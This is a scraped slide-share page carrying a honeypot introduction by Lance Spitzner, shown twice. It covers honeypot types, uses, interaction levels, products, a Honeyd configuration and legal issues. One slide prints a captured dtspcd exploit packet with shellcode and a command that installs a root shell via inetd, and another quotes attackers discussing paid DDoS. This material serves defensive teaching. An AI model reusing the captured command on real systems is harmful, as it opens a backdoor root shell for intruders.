logging in or signing up honeypots unnikrishna Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 203 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: March 28, 2010 This Presentation is Public Favorites: 0 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript Honeypots : Honeypots Your Speaker : Your Speaker Lance Spitzner Senior Security Architect, Sun Microsystems Founder of the Honeynet Project Author of Honeypots: Tracking Hackers Co-author of Know Your Enemy Moderator of <honeypots@securityfocus.com> maillist Former ‘tread head’. Purpose : Purpose To introduce you to honeypots, what they are, how they work, their value. Problem : Problem Variety of misconceptions about honeypots, everyone has their own definition. This confusion has caused lack of understanding, and adoption. Honeypot Timeline : Honeypot Timeline 1990/1991 The Cuckoo’s Egg and Evening with Berferd 1997 - Deception Toolkit 1998 - CyberCop Sting 1998 - NetFacade (and Snort) 1998 - BackOfficer Friendly 1999 - Formation of the Honeynet Project 2001 - Worms captured 2002 - dtspcd exploit capture Definition : Definition Any security resource who’s value lies in being probed, attacked, or compromised How honeypots work : How honeypots work Simple concept A resource that expects no data, so any traffic to or from it is most likely unauthorized activity Not limited to specific purpose : Not limited to specific purpose Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture. Their value, and the problems they help solve, depend on how build, deploy, and you use them. Types : Types Production (Law Enforcment) Research (Counter-Intelligence) Marty’s idea Value : Value What is the value of honeypots? One of the greatest areas of confusion concerning honeypot technologies. Advantages : Advantages Based on how honeypots conceptually work, they have several advantages. Reduce False Positives and False Negatives Data Value Resources Simplicity Disadvantages : Disadvantages Based on the concept of honeypots, they also have disadvantages: Narrow Field of View Fingerprinting Risk Production : Production Prevention Detection Response Prevention : Prevention Keeping the burglar out of your house. Honeypots, in general are not effective prevention mechanisms. Deception, Deterence, Decoys, are phsychological weapons. They do NOT work against automated attacks: worms auto-rooters mass-rooters Detection : Detection Detecting the burglar when he breaks in. Honeypots excel at this capability, due to their advantages. Response : Response Honeypots can be used to help respond to an incident. Can easily be pulled offline (unlike production systems. Little to no data pollution. Research Honeypots : Research Honeypots Early Warning and Prediction Discover new Tools and Tactics Understand Motives, Behavior, and Organization Develop Analysis and Forensic Skills Early Warning and Prediction : Early Warning and Prediction Tools : Tools 01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112 TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32 TCP Options (3) => NOP NOP TS: 463986683 4158792 30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e00 30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 ...10...@. 80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@. 80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@. D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#.. 82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh 20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in 67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/ 74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/ 69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x; 73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm 20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA Tactics : Tactics Motives and Behavior : Motives and Behavior J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time" J1LL: it was illegal last I checked. J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting. Level of Interaction : Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk. Risk : Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations. Low Interaction : Low Interaction Provide Emulated Services No operating system for attacker to access. Information limited to transactional information and attackers activities with emulated services. High Interaction : High Interaction Provide Actual Operating Systems Learn extensive amounts of information. Extensive risk. Honeypots : Honeypots BackOfficer Friendly http://www.nfr.com/products/bof/ SPECTER http://www.specter.com Honeyd http://www.citi.umich.edu/u/provos/honeyd/ ManTrap http://www.recourse.com Honeynets http://project.honeynet.org/papers/honeynet/ Low Interaction High Interaction BackOfficer Friendly : BackOfficer Friendly Specter : Specter Honeyd : Honeyd create default set default personality "FreeBSD 2.2.1-STABLE" set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set template uptime 3284460 bind 192.168.1.200 windows ManTrap : ManTrap Honeynets : Honeynets Which is best? : Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve. Legal Issues : Legal Issues Privacy Entrapment Liability Legal Contact for .mil / .gov : Legal Contact for .mil / .gov Department of Justice, Computer Crime and Intellectual Property Section General Number: (202) 514-1026 Specific Contact: Richard Salgado Direct Telephone (202) 353-7848 E-Mai: richard.salgado@usdoj.gov Summary : Summary Honeypos are a highly flexible security tool that can be used in a variety of different deployments. Resources : Resources Honeypots: Tracking Hackers http://www.tracking-hackers.com You do not have the permission to view this presentation. In order to view it, please contact the author of the presentation.
honeypots unnikrishna Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 203 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: March 28, 2010 This Presentation is Public Favorites: 0 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript Honeypots : Honeypots Your Speaker : Your Speaker Lance Spitzner Senior Security Architect, Sun Microsystems Founder of the Honeynet Project Author of Honeypots: Tracking Hackers Co-author of Know Your Enemy Moderator of <honeypots@securityfocus.com> maillist Former ‘tread head’. Purpose : Purpose To introduce you to honeypots, what they are, how they work, their value. Problem : Problem Variety of misconceptions about honeypots, everyone has their own definition. This confusion has caused lack of understanding, and adoption. Honeypot Timeline : Honeypot Timeline 1990/1991 The Cuckoo’s Egg and Evening with Berferd 1997 - Deception Toolkit 1998 - CyberCop Sting 1998 - NetFacade (and Snort) 1998 - BackOfficer Friendly 1999 - Formation of the Honeynet Project 2001 - Worms captured 2002 - dtspcd exploit capture Definition : Definition Any security resource who’s value lies in being probed, attacked, or compromised How honeypots work : How honeypots work Simple concept A resource that expects no data, so any traffic to or from it is most likely unauthorized activity Not limited to specific purpose : Not limited to specific purpose Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture. Their value, and the problems they help solve, depend on how build, deploy, and you use them. Types : Types Production (Law Enforcment) Research (Counter-Intelligence) Marty’s idea Value : Value What is the value of honeypots? One of the greatest areas of confusion concerning honeypot technologies. Advantages : Advantages Based on how honeypots conceptually work, they have several advantages. Reduce False Positives and False Negatives Data Value Resources Simplicity Disadvantages : Disadvantages Based on the concept of honeypots, they also have disadvantages: Narrow Field of View Fingerprinting Risk Production : Production Prevention Detection Response Prevention : Prevention Keeping the burglar out of your house. Honeypots, in general are not effective prevention mechanisms. Deception, Deterence, Decoys, are phsychological weapons. They do NOT work against automated attacks: worms auto-rooters mass-rooters Detection : Detection Detecting the burglar when he breaks in. Honeypots excel at this capability, due to their advantages. Response : Response Honeypots can be used to help respond to an incident. Can easily be pulled offline (unlike production systems. Little to no data pollution. Research Honeypots : Research Honeypots Early Warning and Prediction Discover new Tools and Tactics Understand Motives, Behavior, and Organization Develop Analysis and Forensic Skills Early Warning and Prediction : Early Warning and Prediction Tools : Tools 01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112 TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32 TCP Options (3) => NOP NOP TS: 463986683 4158792 30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e00 30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 ...10...@. 80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@. 80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@. D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#.. 82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh 20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in 67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/ 74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/ 69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x; 73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm 20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA Tactics : Tactics Motives and Behavior : Motives and Behavior J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time" J1LL: it was illegal last I checked. J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting. Level of Interaction : Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk. Risk : Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations. Low Interaction : Low Interaction Provide Emulated Services No operating system for attacker to access. Information limited to transactional information and attackers activities with emulated services. High Interaction : High Interaction Provide Actual Operating Systems Learn extensive amounts of information. Extensive risk. Honeypots : Honeypots BackOfficer Friendly http://www.nfr.com/products/bof/ SPECTER http://www.specter.com Honeyd http://www.citi.umich.edu/u/provos/honeyd/ ManTrap http://www.recourse.com Honeynets http://project.honeynet.org/papers/honeynet/ Low Interaction High Interaction BackOfficer Friendly : BackOfficer Friendly Specter : Specter Honeyd : Honeyd create default set default personality "FreeBSD 2.2.1-STABLE" set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set template uptime 3284460 bind 192.168.1.200 windows ManTrap : ManTrap Honeynets : Honeynets Which is best? : Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve. Legal Issues : Legal Issues Privacy Entrapment Liability Legal Contact for .mil / .gov : Legal Contact for .mil / .gov Department of Justice, Computer Crime and Intellectual Property Section General Number: (202) 514-1026 Specific Contact: Richard Salgado Direct Telephone (202) 353-7848 E-Mai: richard.salgado@usdoj.gov Summary : Summary Honeypos are a highly flexible security tool that can be used in a variety of different deployments. Resources : Resources Honeypots: Tracking Hackers http://www.tracking-hackers.com